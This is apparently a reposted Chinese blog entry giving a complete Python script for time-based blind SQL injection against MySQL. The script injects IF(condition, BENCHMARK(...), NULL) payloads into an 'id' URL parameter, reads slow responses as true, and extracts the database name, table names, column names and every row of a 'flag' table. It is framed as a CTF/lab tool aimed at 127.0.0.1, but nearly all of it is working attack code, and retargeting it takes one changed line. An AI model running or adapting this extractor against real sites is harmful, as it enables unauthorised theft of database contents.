SQL注入——基于时间延迟的 benchmark 函数注入脚本
阅读量:5105 次
发布时间:2019-06-13


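#author:windy_2
"""Time-based blind SQL injection extractor for a MySQL backend.

Every question ("is the 3rd character of the database name an 'f'?") is
turned into a MySQL ``IF(<cond>, BENCHMARK(...), NULL)`` expression and
injected into the ``id`` parameter of ``BASE_URL``; a response slower than
``DELAY_THRESHOLD`` seconds is read as "true".  From that single boolean
oracle the script recovers the database name, its table names, the column
names of one table and finally that table's rows.

Lab/CTF tool: it is hard-wired to 127.0.0.1.  Only use it against systems
you are authorised to test.

Known limitations (inherent to the approach):
  * Timing oracles are noisy.  A fixed threshold mis-classifies on a slow or
    busy server, so ``main()`` checks two known-answer conditions before
    extracting anything.
  * ``payloads`` has no upper-case letters and only the symbols ``{}_``; a
    position whose character is not in the set is reported as ``?`` rather
    than being silently dropped.
"""

BASE_URL = 'http://127.0.0.1/?id='
# Seconds above which a response is interpreted as the injected condition
# being true.  BENCHMARK(1000000, md5(...)) normally takes a few seconds.
DELAY_THRESHOLD = 1.5
# Hard upper bound per request so a stalled server cannot hang the run.
# Keep it well above the expected BENCHMARK delay, otherwise "true" answers
# surface as timeouts instead of being measured.
REQUEST_TIMEOUT = 30
BENCHMARK = "benchmark(1000000,md5('test'))"
# Characters tried, in order, for every position of every recovered string.
payloads = 'qwertyuiopasdfghjklzxcvbnm{}_0123456789'
# Kept for backward compatibility with the original script; payload URLs are
# now assembled by _condition_url().
urlx = BASE_URL + ' 1 and if((substr((select database()),'


def _condition_url(condition):
    """Embed *condition* in the injected IF(...) and return the full URL.

    The injected fragment is ``1 and if((<condition>),BENCHMARK,NULL); #``
    (``%23`` is the URL-encoded ``#`` that comments out the remainder of the
    original statement).
    """
    return BASE_URL + ' 1 and if((' + condition + '),' + BENCHMARK + ',NULL); %23'


def _response_seconds(url, timeout=REQUEST_TIMEOUT):
    """GET *url* and return how long the server took to answer, in seconds.

    Propagates ``requests.RequestException`` (including ``Timeout``): a
    transport failure is not a valid "false" answer and must not be swallowed.
    """
    # Local import: the extraction logic in this module is pure and can be
    # imported and unit-tested without the HTTP dependency installed.
    import requests
    response = requests.get(url, timeout=timeout)
    return response.elapsed.total_seconds()


def _make_oracle(fetch=_response_seconds, threshold=DELAY_THRESHOLD):
    """Return ``oracle(condition) -> bool`` backed by the timing side channel."""
    def oracle(condition):
        # A fresh measurement for every question.  The original script reused
        # a stale timing in its column-length loop and so never recovered a
        # single column name.
        return fetch(_condition_url(condition)) > threshold
    return oracle


def _verify_oracle(oracle):
    """Sanity-check the side channel with two known-answer conditions.

    Raises RuntimeError when a tautology is not reported slow (injection
    point or BENCHMARK not effective) or a contradiction is reported slow
    (server too slow / threshold too low) -- either would silently produce
    garbage.
    """
    if not oracle('1=1'):
        raise RuntimeError('true condition did not delay: injection or BENCHMARK not effective')
    if oracle('1=2'):
        raise RuntimeError('false condition delayed: raise DELAY_THRESHOLD or check server load')


def _guess_count(oracle, subquery, stop, start=0):
    """Return the first n in range(start, stop) for which ``(subquery)=n`` holds.

    Returns 0 when nothing in the range matches (the original behaviour);
    callers treat 0 as "nothing to extract".
    """
    for n in range(start, stop):
        if oracle('(' + subquery + ')=' + str(n)):
            return n
    return 0


def _guess_string(oracle, value_expr, length, charset=payloads):
    """Recover *length* characters of the scalar SQL expression *value_expr*.

    Each position is compared against every character of *charset* with
    ``substr(<value_expr>,<pos>,1)='<ch>'``.  A position matching no
    character becomes ``?`` so the gap is visible to the operator.
    """
    chars = []
    for pos in range(1, length + 1):
        for ch in charset:
            if oracle('substr(' + value_expr + ',' + str(pos) + ",1)='" + ch + "'"):
                chars.append(ch)
                break
        else:
            chars.append('?')
    return ''.join(chars)


def guess_column(table, oracle=None):
    """Dump *table*: recover its column names, then every row, and print them.

    Args:
        table: table name in the current database; interpolated verbatim into
            the injected SQL (it is attacker-side input here, not a target).
        oracle: ``condition -> bool`` callable; defaults to the timing oracle
            against BASE_URL.

    Returns:
        ``(columns, rows)``: the column names and a list of rows, each a list
        of cell strings in column order.
    """
    if oracle is None:
        oracle = _make_oracle()
    where = "from information_schema.columns where table_name='" + table + "'"

    column_count = _guess_count(oracle, 'select count(column_name) ' + where, 50)
    columns = []
    for idx in range(column_count):
        row_of = ' ' + where + ' limit ' + str(idx) + ',1'
        name_len = _guess_count(oracle, 'select length(column_name)' + row_of, 100)
        columns.append(_guess_string(oracle, '(select column_name' + row_of + ')', name_len))

    if not columns:
        print('[!] no columns found for table ' + table)
        return columns, []

    # count(*) rather than count(<first column>): the original under-counted
    # when the first column held NULLs and raised IndexError when no column
    # name had been recovered.
    row_count = _guess_count(oracle, 'select count(*) from ' + table, 10000, start=1)
    # Rows are indexed explicitly.  The original flattened cells per column
    # and then printed num[i + length*k] with the loop bounds swapped, which
    # mis-aligned the table and overflowed when rows outnumbered columns.
    rows = [[] for _ in range(row_count)]
    for column in columns:
        for idx in range(row_count):
            cell = ' from ' + table + ' limit ' + str(idx) + ',1'
            cell_len = _guess_count(oracle, 'select length(' + column + ')' + cell, 100)
            rows[idx].append(_guess_string(oracle, '(select ' + column + cell + ')', cell_len))

    print('    '.join(columns))
    for row in rows:
        print('    '.join(row))
    return columns, rows


def guess_table(oracle=None, dump_table='flag'):
    """Recover the table names of the current database and print them.

    Args:
        oracle: see guess_column().
        dump_table: table handed to guess_column() afterwards.  The default
            preserves the original script, which always dumped ``flag``
            regardless of what it found; pass None to only list tables.

    Returns:
        The list of recovered table names.
    """
    if oracle is None:
        oracle = _make_oracle()
    where = 'from information_schema.tables where table_schema=database()'

    table_count = _guess_count(oracle, 'select count(table_name) ' + where, 50)
    tables = []
    for idx in range(table_count):
        row_of = ' ' + where + ' limit ' + str(idx) + ',1'
        name_len = _guess_count(oracle, 'select length(table_name)' + row_of, 100)
        tables.append(_guess_string(oracle, '(select table_name' + row_of + ')', name_len))

    print('------------')
    for name in tables:
        print(f'[*]{name}')
    print('------------')
    if dump_table is not None:
        guess_column(dump_table, oracle)
    return tables


def main(oracle=None):
    """Entry point: verify the oracle, then database name -> tables -> dump."""
    if oracle is None:
        oracle = _make_oracle()
    _verify_oracle(oracle)
    name_len = _guess_count(oracle, 'length(database())', 20)
    database = _guess_string(oracle, '(select database())', name_len)
    print(f'available database\n[*] {database}')
    guess_table(oracle)


if __name__ == '__main__':
    main()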

 

转载于:https://www.cnblogs.com/aWxvdmVseXc0/p/10029914.html
